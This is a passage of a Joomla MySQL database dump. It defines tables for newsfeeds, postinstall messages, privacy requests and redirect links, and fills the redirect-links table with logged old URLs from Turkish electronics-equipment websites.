00:00:00',3,1,1,'en-GB','{\"show_feed_image\":\"\",\"show_feed_description\":\"\",\"show_item_description\":\"\",\"feed_character_count\":\"0\",\"newsfeed_layout\":\"\",\"feed_display_order\":\"\"}','2011-01-01 00:00:01',676,'','2011-12-27 12:25:10',42,'','','{\"robots\":\"\",\"rights\":\"\"}','','0000-00-00 00:00:00','0000-00-00 00:00:00','',1,0,'');
/*!40000 ALTER TABLE `fz6t4_newsfeeds` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fz6t4_overrider`
--

DROP TABLE IF EXISTS `fz6t4_overrider`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `fz6t4_overrider` (
  `id` int NOT NULL AUTO_INCREMENT COMMENT 'Primary Key',
  `constant` varchar(255) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL,
  `string` mediumtext CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL,
  `file` varchar(255) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL,
  PRIMARY KEY (`id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fz6t4_overrider`
--

LOCK TABLES `fz6t4_overrider` WRITE;
/*!40000 ALTER TABLE `fz6t4_overrider` DISABLE KEYS */;
/*!40000 ALTER TABLE `fz6t4_overrider` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fz6t4_postinstall_messages`
--

DROP TABLE IF EXISTS `fz6t4_postinstall_messages`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `fz6t4_postinstall_messages` (
  `postinstall_message_id` bigint unsigned NOT NULL AUTO_INCREMENT,
  `extension_id` bigint NOT NULL DEFAULT '700' COMMENT 'FK to #__extensions',
  `title_key` varchar(255) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '' COMMENT 'Lang key for the title',
  `description_key` varchar(255) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '' COMMENT 'Lang key for description',
  `action_key` varchar(255) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `language_extension` varchar(255) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT 'com_postinstall' COMMENT 'Extension holding lang keys',
  `language_client_id` tinyint NOT NULL DEFAULT '1',
  `type` varchar(10) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT 'link' COMMENT 'Message type - message, link, action',
  `action_file` varchar(255) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci DEFAULT '' COMMENT 'RAD URI to the PHP file containing action method',
  `action` varchar(255) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci DEFAULT '' COMMENT 'Action method name or URL',
  `condition_file` varchar(255) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci DEFAULT NULL COMMENT 'RAD URI to file holding display condition method',
  `condition_method` varchar(255) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci DEFAULT NULL COMMENT 'Display condition method, must return boolean',
  `version_introduced` varchar(50) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '3.2.0' COMMENT 'Version when this message was introduced',
  `enabled` tinyint NOT NULL DEFAULT '1',
  PRIMARY KEY (`postinstall_message_id`)
) ENGINE=MyISAM AUTO_INCREMENT=11 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fz6t4_postinstall_messages`
--

LOCK TABLES `fz6t4_postinstall_messages` WRITE;
/*!40000 ALTER TABLE `fz6t4_postinstall_messages` DISABLE KEYS */;
INSERT INTO `fz6t4_postinstall_messages` VALUES (1,700,'PLG_PLG_RECAPTCHA_VERSION_1_POSTINSTALL_TITLE','PLG_PLG_RECAPTCHA_VERSION_1_POSTINSTALL_BODY','PLG_PLG_RECAPTCHA_VERSION_1_POSTINSTALL_ACTION','plg_captcha_recaptcha',1,'action','site://plugins/captcha/recaptcha/postinstall/actions.php','recaptcha_postinstall_action','site://plugins/captcha/recaptcha/postinstall/actions.php','recaptcha_postinstall_condition','3.8.6',1),(2,700,'COM_CPANEL_MSG_UPDATEDEFAULTSETTINGS_TITLE','COM_CPANEL_MSG_UPDATEDEFAULTSETTINGS_BODY','','com_cpanel',1,'message','','','admin://components/com_admin/postinstall/updatedefaultsettings.php','admin_postinstall_updatedefaultsettings_condition','3.8.8',1),(3,700,'COM_ACTIONLOGS_POSTINSTALL_TITLE','COM_ACTIONLOGS_POSTINSTALL_BODY','','com_actionlogs',1,'message','','','','','3.9.0',1),(4,700,'COM_PRIVACY_POSTINSTALL_TITLE','COM_PRIVACY_POSTINSTALL_BODY','','com_privacy',1,'message','','','','','3.9.0',1),(5,700,'COM_CPANEL_MSG_ADDNOSNIFF_TITLE','COM_CPANEL_MSG_ADDNOSNIFF_BODY','','com_cpanel',1,'message','','','admin://components/com_admin/postinstall/addnosniff.php','admin_postinstall_addnosniff_condition','3.9.3',1),(6,700,'COM_CPANEL_MSG_TEXTFILTER3919_TITLE','COM_CPANEL_MSG_TEXTFILTER3919_BODY','','com_cpanel',1,'message','','','admin://components/com_admin/postinstall/textfilter3919.php','admin_postinstall_textfilter3919_condition','3.9.19',1),(7,700,'COM_CPANEL_MSG_HTACCESSSVG_TITLE','COM_CPANEL_MSG_HTACCESSSVG_BODY','','com_cpanel',1,'message','','','admin://components/com_admin/postinstall/htaccesssvg.php','admin_postinstall_htaccesssvg_condition','3.9.21',1),(8,700,'COM_ADMIN_POSTINSTALL_MSG_HTACCESS_AUTOINDEX_TITLE','COM_ADMIN_POSTINSTALL_MSG_HTACCESS_AUTOINDEX_DESCRIPTION','','com_admin',1,'message','','',NULL,NULL,'3.9.22',1),(9,700,'COM_ADMIN_POSTINSTALL_MSG_BEHIND_LOAD_BALANCER_TITLE','COM_ADMIN_POSTINSTALL_MSG_BEHIND_LOAD_BALANCER_DESCRIPTION','COM_ADMIN_POSTINSTALL_MSG_BEHIND_LOAD_BALANCER_ACTION','com_admin',1,'action','admin://components/com_admin/postinstall/behindproxy.php','behindproxy_postinstall_action','admin://components/com_admin/postinstall/behindproxy.php','admin_postinstall_behindproxy_condition','3.9.26',1);
/*!40000 ALTER TABLE `fz6t4_postinstall_messages` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fz6t4_privacy_consents`
--

DROP TABLE IF EXISTS `fz6t4_privacy_consents`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `fz6t4_privacy_consents` (
  `id` int unsigned NOT NULL AUTO_INCREMENT,
  `user_id` int unsigned NOT NULL DEFAULT '0',
  `state` int NOT NULL DEFAULT '1',
  `created` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `subject` varchar(255) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `body` text CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL,
  `remind` tinyint NOT NULL DEFAULT '0',
  `token` varchar(100) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  PRIMARY KEY (`id`),
  KEY `idx_user_id` (`user_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fz6t4_privacy_consents`
--

LOCK TABLES `fz6t4_privacy_consents` WRITE;
/*!40000 ALTER TABLE `fz6t4_privacy_consents` DISABLE KEYS */;
/*!40000 ALTER TABLE `fz6t4_privacy_consents` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fz6t4_privacy_requests`
--

DROP TABLE IF EXISTS `fz6t4_privacy_requests`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `fz6t4_privacy_requests` (
  `id` int unsigned NOT NULL AUTO_INCREMENT,
  `email` varchar(100) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `requested_at` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `status` tinyint NOT NULL DEFAULT '0',
  `request_type` varchar(25) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `confirm_token` varchar(100) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `confirm_token_created_at` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fz6t4_privacy_requests`
--

LOCK TABLES `fz6t4_privacy_requests` WRITE;
/*!40000 ALTER TABLE `fz6t4_privacy_requests` DISABLE KEYS */;
/*!40000 ALTER TABLE `fz6t4_privacy_requests` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fz6t4_redirect_links`
--

DROP TABLE IF EXISTS `fz6t4_redirect_links`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `fz6t4_redirect_links` (
  `id` int unsigned NOT NULL AUTO_INCREMENT,
  `old_url` varchar(2048) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL,
  `new_url` varchar(2048) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `referer` varchar(2048) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL,
  `comment` varchar(255) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `hits` int unsigned NOT NULL DEFAULT '0',
  `published` tinyint NOT NULL,
  `created_date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `modified_date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `header` smallint NOT NULL DEFAULT '301',
  PRIMARY KEY (`id`),
  KEY `idx_link_modifed` (`modified_date`),
  KEY `idx_old_url` (`old_url`(100))
) ENGINE=MyISAM AUTO_INCREMENT=80283 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fz6t4_redirect_links`
--

LOCK TABLES `fz6t4_redirect_links` WRITE;
/*!40000 ALTER TABLE `fz6t4_redirect_links` DISABLE KEYS */;
INSERT INTO `fz6t4_redirect_links` VALUES (1,'http://www.nova-elektronik.com.tr/index.php/tr/tp=1','','','',1,0,'2014-08-01 07:40:51','0000-00-00 00:00:00',301),(2,'http://www.nova-elektronik.com.tr/index.php/tr/anasayfa2&tp=1','','','',1,0,'2014-08-01 08:36:24','0000-00-00 00:00:00',301),(3,'http://nova-elektronik.com.tr/index.php/welcome.html','','','',1,0,'2014-08-01 10:32:45','0000-00-00 00:00:00',301),(4,'http://nova-elektronik.com.tr/index.php/tr/parks-home','','','',1,0,'2014-08-01 10:32:54','0000-00-00 00:00:00',301),(5,'http://nova-elektronik.com.tr/index.php/en/ueruenler','','','',1,0,'2014-08-01 10:47:43','0000-00-00 00:00:00',301),(6,'http://nova-elektronik.com.tr/index.php/en/ueruenler/smd-orta-hızlı','','','',1,0,'2014-08-01 10:48:42','0000-00-00 00:00:00',301),(7,'http://nova-elektronik.com.tr/index.php/en/ueruenler/smd-düşük-hızlı','','','',1,0,'2014-08-01 10:48:50','0000-00-00 00:00:00',301),(8,'http://nova-elektronik.com.tr/index.php/tr/?option=com_user&view=remind&lang=tr','','','',1,0,'2014-08-01 20:43:19','0000-00-00 00:00:00',301),(9,'http://nova-elektronik.com.tr/index.php/tr/?option=com_user&task=register&lang=en','','','',1,0,'2014-08-01 21:22:05','0000-00-00 00:00:00',301),(10,'http://www.nova-elektronik.com.tr/index.php?option=com_user&task=register&lang=tr','','','',2,0,'2014-08-02 04:57:07','0000-00-00 00:00:00',301),(11,'http://nova-elektronik.com.tr/index.php/en/site-map','','','',1,0,'2014-08-02 05:05:54','0000-00-00 00:00:00',301),(12,'http://nova-elektronik.com.tr/index.php/tr/sample-sites','','','',1,0,'2014-08-02 05:10:11','0000-00-00 00:00:00',301),(13,'http://nova-elektronik.com.tr/index.php/tr/login','','','',1,0,'2014-08-02 05:49:54','0000-00-00 00:00:00',301),(14,'http://nova-elektronik.com.tr/index.php/en/login','','','',1,0,'2014-08-02 06:05:15','0000-00-00 00:00:00',301),(15,'http://nova-elektronik.com.tr/index.php/en/contacts-en','','','',1,0,'2014-08-02 08:38:27','0000-00-00 00:00:00',301),(16,'http://nova-elektronik.com.tr/index.php/en/sample-sites','','','',1,0,'2014-08-02 08:43:44','0000-00-00 00:00:00',301),(17,'http://nova-elektronik.com.tr/index.php/tr/site-map','','','',1,0,'2014-08-02 09:42:59','0000-00-00 00:00:00',301),(18,'http://nova-elektronik.com.tr/index.php?option=com_user&view=reset&lang=en','','','',1,0,'2014-08-02 15:25:00','0000-00-00 00:00:00',301),(19,'http://nova-elektronik.com.tr/index.php/tr/?option=com_user&view=remind&lang=en','','','',1,0,'2014-08-02 15:39:00','0000-00-00 00:00:00',301),(20,'http://www.nova-elektronik.com.tr/index.php?option=com_user&view=remind&lang=tr','','','',1,0,'2014-08-02 15:59:54','0000-00-00 00:00:00',301),(21,'http://www.nova-elektronik.com.tr/index.php/tr/?option=com_user&task=register&lang=tr','','','',1,0,'2014-08-02 21:55:41','0000-00-00 00:00:00',301),(22,'http://www.nova-elektronik.com.tr/index.php/en/contacts-en','','','',1,0,'2014-08-02 22:50:45','0000-00-00 00:00:00',301),(23,'http://nova-elektronik.com.tr/index.php?option=com_user&view=remind&lang=tr','','','',1,0,'2014-08-03 07:05:40','0000-00-00 00:00:00',301),(24,'http://nova-elektronik.com.tr/index.php?option=com_user&task=register&lang=tr','','','',1,0,'2014-08-03 07:22:59','0000-00-00 00:00:00',301),(25,'http://proneo-led.com/3s-technologies.com.tr/j2.5/index.php/en/contacts-en','','','',1,0,'2014-08-03 10:09:36','0000-00-00 00:00:00',301),(26,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=125&Itemid=131&lang=en','','http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=127&Itemid=134&lang=en','',20,0,'2014-08-03 12:15:45','0000-00-00 00:00:00',301),(27,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=164&Itemid=160&lang=tr','','','',41,0,'2014-08-03 12:17:21','0000-00-00 00:00:00',301),(28,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=164&Itemid=160&lang=en','','','',16,0,'2014-08-03 12:18:36','0000-00-00 00:00:00',301),(29,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=category&id=54&Itemid=114&lang=tr','','','',33,0,'2014-08-03 12:22:12','0000-00-00 00:00:00',301),(30,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=155&Itemid=81&lang=tr','','','',18,0,'2014-08-03 12:23:27','0000-00-00 00:00:00',301),(31,'http://3s-technologies.com.tr/index.php?option=com_content&view=article&id=126&Itemid=133&lang=en','','','',2,0,'2014-08-03 12:25:01','0000-00-00 00:00:00',301),(32,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=112:smd-firin-temizleme-roc&catid=40:temizleme&Itemid=123&lang=en','','','',56,0,'2014-08-03 12:27:05','0000-00-00 00:00:00',301),(33,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=83:neomark&catid=51:neo&Itemid=95&lang=tr','','','',1,0,'2014-08-03 12:28:21','0000-00-00 00:00:00',301),(34,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=149&Itemid=150&lang=tr','','','',24,0,'2014-08-03 12:30:51','0000-00-00 00:00:00',301),(35,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=96&Itemid=107&lang=en','','','',13,0,'2014-08-03 12:38:43','0000-00-00 00:00:00',301),(36,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=96&Itemid=107&lang=en','','','',1,0,'2014-08-03 12:42:52','0000-00-00 00:00:00',301),(37,'http://led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=90&Itemid=102&lang=tr','','','',2,0,'2014-08-03 12:46:24','0000-00-00 00:00:00',301),(38,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=137:chip-max-rosh-rdy&catid=56:rework-stasyonlari&Itemid=139&lang=tr','','','',2,0,'2014-08-03 12:46:51','0000-00-00 00:00:00',301),(39,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=137:chip-max-rosh-rdy&catid=56:rework-stasyonlari&Itemid=139&lang=en','','','',9,0,'2014-08-03 12:51:59','0000-00-00 00:00:00',301),(40,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=141:marksman&catid=56:rework-stasyonlari&Itemid=143&lang=en','','','',3,0,'2014-08-03 12:57:13','0000-00-00 00:00:00',301),(41,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=category&id=39&Itemid=57&lang=en','','','',43,0,'2014-08-03 13:00:59','0000-00-00 00:00:00',301),(42,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=category&id=39:lehimleme&Itemid=57&layout=default&lang=tr','','','',64,0,'2014-08-03 13:01:15','0000-00-00 00:00:00',301),(43,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=94&Itemid=105&lang=en','','','',4,0,'2014-08-03 13:07:22','0000-00-00 00:00:00',301),(44,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=88&Itemid=100&lang=tr','','','',9,0,'2014-08-03 13:08:20','0000-00-00 00:00:00',301),(45,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=category&id=54:pcb-ve-stensil-temizleme-makineleri&Itemid=114&layout=default&lang=en','','','',6,0,'2014-08-03 13:13:13','0000-00-00 00:00:00',301),(46,'http://led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=93&Itemid=104&lang=tr','','','',3,0,'2014-08-03 13:15:00','0000-00-00 00:00:00',301),(47,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=156&Itemid=157&lang=en','','','',10,0,'2014-08-03 13:17:10','0000-00-00 00:00:00',301),(48,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=156&Itemid=157&lang=en','','','',16,0,'2014-08-03 13:18:33','0000-00-00 00:00:00',301),(49,'http://led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=42&Itemid=27&lang=tr','','','',10,0,'2014-08-03 13:20:04','0000-00-00 00:00:00',301),(50,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=category&id=43&Itemid=2&lang=en','','','',27,0,'2014-08-03 13:21:13','0000-00-00 00:00:00',301),(51,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=category&id=43&Itemid=2&lang=tr','','','',2,0,'2014-08-03 13:24:02','0000-00-00 00:00:00',301),(52,'http://3s-technologies.com.tr/index.php?option=com_content&view=article&id=151:le40&catid=58:dusuk-hizli-smd-dizgi&Itemid=152&lang=en','','','',7,0,'2014-08-03 13:28:46','0000-00-00 00:00:00',301),(53,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=72&Itemid=78&lang=en','','','',1,0,'2014-08-03 13:30:08','0000-00-00 00:00:00',301),(54,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=72&Itemid=78&lang=en','','','',10,0,'2014-08-03 13:34:13','0000-00-00 00:00:00',301),(55,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=98&Itemid=109&lang=tr','','','',18,0,'2014-08-03 13:44:23','0000-00-00 00:00:00',301),(56,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=category&id=51&Itemid=92&lang=en','','','',25,0,'2014-08-03 13:47:17','0000-00-00 00:00:00',301),(57,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=157&Itemid=158&lang=en','','','',10,0,'2014-08-03 13:50:29','0000-00-00 00:00:00',301),(58,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=category&id=51&Itemid=92&lang=en','','','',6,0,'2014-08-03 13:52:39','0000-00-00 00:00:00',301),(59,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=category&id=36&Itemid=37&lang=en','','','',24,0,'2014-08-03 13:52:43','0000-00-00 00:00:00',301),(60,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=158&Itemid=159&lang=en','','','',18,0,'2014-08-03 13:55:30','0000-00-00 00:00:00',301),(61,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=158&Itemid=159&lang=en','','','',30,0,'2014-08-03 13:56:59','0000-00-00 00:00:00',301),(62,'http://led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=81&Itemid=40&lang=en','','','',5,0,'2014-08-03 13:57:06','0000-00-00 00:00:00',301),(63,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=157:spartan-8s8d&catid=44:pota&Itemid=158&lang=tr','','','',5,0,'2014-08-03 13:57:06','0000-00-00 00:00:00',301),(64,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=157:spartan-8s8d&catid=44:pota&Itemid=158&lang=tr','','','',81,0,'2014-08-03 14:00:09','0000-00-00 00:00:00',301),(65,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=108:yuksek-guclu-flux-giderici-spr&catid=40:temizleme&Itemid=119&lang=tr','','','',2,0,'2014-08-03 14:00:10','0000-00-00 00:00:00',301),(66,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=112&Itemid=123&lang=en','','','',13,0,'2014-08-03 14:01:43','0000-00-00 00:00:00',301),(67,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=83:neomark&catid=51:neo&Itemid=95&lang=tr','','','',6,0,'2014-08-03 14:04:16','0000-00-00 00:00:00',301),(68,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=99&Itemid=43&lang=en','','','',1,0,'2014-08-03 14:04:54','0000-00-00 00:00:00',301),(69,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=116&Itemid=127&lang=en','','','',35,0,'2014-08-03 14:04:56','0000-00-00 00:00:00',301),(70,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=168&Itemid=58&lang=en','','','',1,0,'2014-08-03 14:06:39','0000-00-00 00:00:00',301),(71,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=116&Itemid=127&lang=en','','','',2,0,'2014-08-03 14:06:40','0000-00-00 00:00:00',301),(72,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=151&Itemid=152&lang=en','','','',24,0,'2014-08-03 14:10:31','0000-00-00 00:00:00',301),(73,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=156&Itemid=157&lang=tr','','','',1,0,'2014-08-03 14:10:32','0000-00-00 00:00:00',301),(74,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=151&Itemid=152&lang=en','','','',11,0,'2014-08-03 14:12:25','0000-00-00 00:00:00',301),(75,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=category&id=46&Itemid=62&lang=tr','','','',1,0,'2014-08-03 14:12:25','0000-00-00 00:00:00',301),(76,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=151&Itemid=152&lang=en','','','',2,0,'2014-08-03 14:14:20','0000-00-00 00:00:00',301),(77,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=category&layout=blog&id=1&Itemid=28&lang=tr','','','',1,0,'2014-08-03 14:14:22','0000-00-00 00:00:00',301),(78,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=category&id=40:temizleme&Itemid=60&layout=default&lang=tr&limitstart=10','','','',2,0,'2014-08-03 14:16:20','0000-00-00 00:00:00',301),(79,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=124&Itemid=130&lang=tr','','','',1,0,'2014-08-03 14:16:22','0000-00-00 00:00:00',301),(80,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=category&id=40:temizleme&Itemid=60&layout=default&lang=tr&limitstart=10','','','',2,0,'2014-08-03 14:18:19','0000-00-00 00:00:00',301),(81,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=124&Itemid=130&lang=en','','','',2,0,'2014-08-03 14:24:11','0000-00-00 00:00:00',301),(82,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=108:yuksek-guclu-flux-giderici-spr&catid=40:temizleme&Itemid=119&lang=en','','','',3,0,'2014-08-03 14:24:14','0000-00-00 00:00:00',301),(83,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=114&Itemid=124&lang=en','','','',1,0,'2014-08-03 14:28:21','0000-00-00 00:00:00',301),(84,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=155:ct-3000n&catid=44:pota&Itemid=81&lang=tr','','','',2,0,'2014-08-03 14:28:24','0000-00-00 00:00:00',301),(85,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=146&Itemid=148&lang=en','','','',6,0,'2014-08-03 14:30:29','0000-00-00 00:00:00',301),(86,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=146&Itemid=148&lang=en','','','',2,0,'2014-08-03 14:30:35','0000-00-00 00:00:00',301),(87,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=category&id=57&Itemid=145&lang=tr','','','',1,0,'2014-08-03 14:34:49','0000-00-00 00:00:00',301),(88,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=146&Itemid=148&lang=tr','','','',2,0,'2014-08-03 14:34:49','0000-00-00 00:00:00',301),(89,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=category&layout=blog&id=1&Itemid=50&lang=tr&limitstart=5','','','',2,0,'2014-08-03 14:36:24','0000-00-00 00:00:00',301),(90,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=105&Itemid=112&lang=en','','','',1,0,'2014-08-03 14:36:25','0000-00-00 00:00:00',301),(91,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=166:lfs-1&catid=44:pota&Itemid=144&lang=en','','','',25,0,'2014-08-03 14:36:30','0000-00-00 00:00:00',301),(92,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=107&Itemid=118&lang=tr','','','',1,0,'2014-08-03 14:36:32','0000-00-00 00:00:00',301),(93,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=110&Itemid=121&lang=tr','','','',1,0,'2014-08-03 14:44:20','0000-00-00 00:00:00',301),(94,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=158&Itemid=159&lang=en','','','',3,0,'2014-08-03 14:44:21','0000-00-00 00:00:00',301),(95,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=125&Itemid=131&lang=en','','','',27,0,'2014-08-03 14:45:35','0000-00-00 00:00:00',301),(96,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=158&Itemid=159&lang=tr','','','',3,0,'2014-08-03 14:45:43','0000-00-00 00:00:00',301),(97,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=127&Itemid=134&lang=tr','','','',36,0,'2014-08-03 14:46:59','0000-00-00 00:00:00',301),(98,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=173:avf1&catid=60:ikinciel&Itemid=164&lang=en','','','',2,0,'2014-08-03 14:47:00','0000-00-00 00:00:00',301),(99,'http://led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=125&Itemid=131&lang=en','','','',6,0,'2014-08-03 14:53:57','0000-00-00 00:00:00',301),(100,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=127&Itemid=134&lang=tr','','','',2,0,'2014-08-03 14:54:36','0000-00-00 00:00:00',301),(101,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=97&Itemid=108&lang=tr','','','',1,0,'2014-08-03 14:54:38','0000-00-00 00:00:00',301),(102,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=category&id=56&Itemid=137&lang=tr','','','',36,0,'2014-08-03 14:58:26','0000-00-00 00:00:00',301),(103,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=42&Itemid=27&lang=tr','','','',23,0,'2014-08-03 14:59:30','0000-00-00 00:00:00',301),(104,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=90&Itemid=102&lang=tr','','','',1,0,'2014-08-03 14:59:44','0000-00-00 00:00:00',301),(105,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=84:neoplace&catid=51:neo&Itemid=96&lang=tr','','','',1,0,'2014-08-03 14:59:46','0000-00-00 